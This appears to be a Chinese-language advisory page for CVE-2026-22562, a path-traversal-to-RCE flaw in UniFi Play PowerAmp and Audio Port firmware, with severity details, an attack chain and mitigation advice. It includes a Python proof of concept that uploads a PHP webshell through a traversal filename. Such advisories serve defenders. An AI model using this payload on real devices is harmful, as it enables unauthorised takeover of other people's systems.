CVE-2026-22562 CVSS 9.8 严重

CVE-2026-22562 UniFi Play路径遍历致RCE漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22562

漏洞类型

路径遍历, 远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

UniFi Play PowerAmp, UniFi Play Audio Port

漏洞概述

UniFi Play系列设备固件中存在严重的路径遍历漏洞。未经身份验证的攻击者可通过网络访问该漏洞，利用恶意请求在系统上写入任意文件。该漏洞可被进一步利用以实现远程代码执行（RCE），从而完全控制受影响设备。此漏洞严重影响PowerAmp和Audio Port产品的安全性，建议立即修复。

技术细节

该漏洞的核心机制在于UniFi Play设备固件在处理文件操作请求时，未能对用户输入的路径参数进行严格的过滤和校验。攻击者可以利用路径遍历技术，例如使用“../”序列或经过编码的跳转字符，绕过Web服务器的目录限制，进而访问操作系统的任意敏感目录。鉴于该漏洞的攻击向量为网络（AV:N），且无需任何前置认证（PR:N），攻击门槛极低。成功利用该漏洞后，攻击者不仅能够读取敏感信息，更关键的是能够在文件系统的任意位置写入恶意文件。通过将恶意脚本或后门程序写入可执行目录，攻击者可以诱导系统执行该代码，最终获得目标设备的远程代码执行（RCE）权限。这将导致攻击者完全接管设备，造成数据泄露、服务中断等严重后果。

攻击链分析

STEP 1

1. Reconnaissance

扫描UniFi Play网络，识别目标的IP地址和开放端口。

STEP 2

2. Exploit Initiation

向目标设备发送特制的HTTP请求，利用路径遍历漏洞绕过目录限制。

STEP 3

3. Arbitrary File Write

通过漏洞将包含恶意代码的文件（如WebShell）写入系统可执行目录。

STEP 4

4. Remote Code Execution

访问写入的恶意文件或触发系统调用，在目标设备上执行任意系统命令，获取控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-22562: Path Traversal leading to RCE
# Target: UniFi Play PowerAmp / Audio Port
# Note: This is a conceptual demonstration for educational purposes.

target_url = "http://<TARGET_IP>/api/upload"

# Malicious payload: PHP webshell
payload = "<?php system($_GET['cmd']); ?>"

# Path traversal sequence to write to web root
filename = "../../../../../../var/www/html/shell.php"

headers = {
    "User-Agent": "PoC-Scanner",
    "Content-Type": "application/octet-stream"
}

try:
    # Sending the malicious request with traversal path
    response = requests.post(
        target_url,
        headers=headers,
        data=payload,
        params={"file": filename},
        timeout=10
    )

    if response.status_code == 200:
        print("[+] Potential exploitation successful.")
        print(f"[+] Check shell at: http://<TARGET_IP>/shell.php?cmd=whoami")
    else:
        print("[-] Target may not be vulnerable or patched.")

except Exception as e:
    print(f"Error connecting to target: {e}")

影响范围

UniFi Play PowerAmp <= 1.0.35

UniFi Play Audio Port <= 1.0.24

防御指南

临时缓解措施

如果无法立即更新固件，建议将受影响设备隔离在独立的VLAN中，并关闭不必要的网络端口，仅允许受信任的IP地址访问设备管理界面，以降低被攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表